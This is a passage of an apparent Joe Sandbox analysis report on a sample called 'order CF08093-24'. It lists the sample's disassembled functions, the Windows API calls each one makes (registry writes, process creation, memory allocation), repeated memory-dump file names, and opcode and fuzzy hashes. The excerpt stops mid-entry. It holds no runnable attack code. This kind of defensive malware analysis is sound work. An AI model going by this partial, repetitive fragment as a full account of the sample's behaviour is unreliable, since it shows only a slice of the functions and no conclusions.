                                                                            • Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                            • Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                            Function 00406FAB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                            • Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
                                                                            • Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                            • Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45
                                                                            Function 00406AB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                            • Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
                                                                            • Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                            • Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
                                                                            Function 00406EFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                            • Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
                                                                            • Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                            • Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
                                                                            Function 0040701C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                            • Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
                                                                            • Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                            • Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
                                                                            Function 00406F68 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                            • Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
                                                                            • Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                            • Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
                                                                            Function 00401BC0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401C30
                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree
                                                                            • String ID: 32079
                                                                            • API String ID: 3394109436-2447952077
                                                                            • Opcode ID: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                                                            • Instruction ID: b885d26f68b874ad9ff9a305e80acb85bda866dca5011e4f065ba1a91b1516cf
                                                                            • Opcode Fuzzy Hash: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                                                            • Instruction Fuzzy Hash: 09218473904610ABD730ABA4DE85A6E72A4AB04328715053FF952B32D4C6BCE8919B5D
                                                                            Function 004024AF Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024FA
                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 0040253A
                                                                            • RegCloseKey.ADVAPI32(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402622
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValuelstrlen
                                                                            • String ID:
                                                                            • API String ID: 2655323295-0
                                                                            • Opcode ID: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
                                                                            • Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
                                                                            • Opcode Fuzzy Hash: 833edd450bf946c24d3a3f94cfbbaf1e2376c793e7492529022bf014ff981997
                                                                            • Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668
                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                            • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                            • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                            • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                            Function 00405699 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 004056A9
                                                                              • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeMessageSendUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2896919175-0
                                                                            • Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                            • Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
                                                                            • Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                            • Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D
                                                                            Function 00401F03 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableShow
                                                                            • String ID:
                                                                            • API String ID: 1136574915-0
                                                                            • Opcode ID: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                                                            • Instruction ID: cc057469d20fee5af05168c8280afa7b014ceb16d0f4b1b408cb009327ac905f
                                                                            • Opcode Fuzzy Hash: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                                                            • Instruction Fuzzy Hash: 7BE04876908610DFE754EBA4AE495EE73B4EF80365B10097FE001F11D1D7B94D00975D
                                                                            Function 00405B24 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                            • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3712363035-0
                                                                            • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                            • Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
                                                                            • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                            • Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C
                                                                            Function 00401598 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                            • Instruction ID: ad827bfb45cde9ed8aa1bf7c1acfcc20c377366860c5f8f00bfddef7402fec92
                                                                            • Opcode Fuzzy Hash: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                            • Instruction Fuzzy Hash: 52E04F72B11114ABCB18CBA8EDD086E73B6AB54310350453FD502B36A4CA759C418B58
                                                                            Function 00406935 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
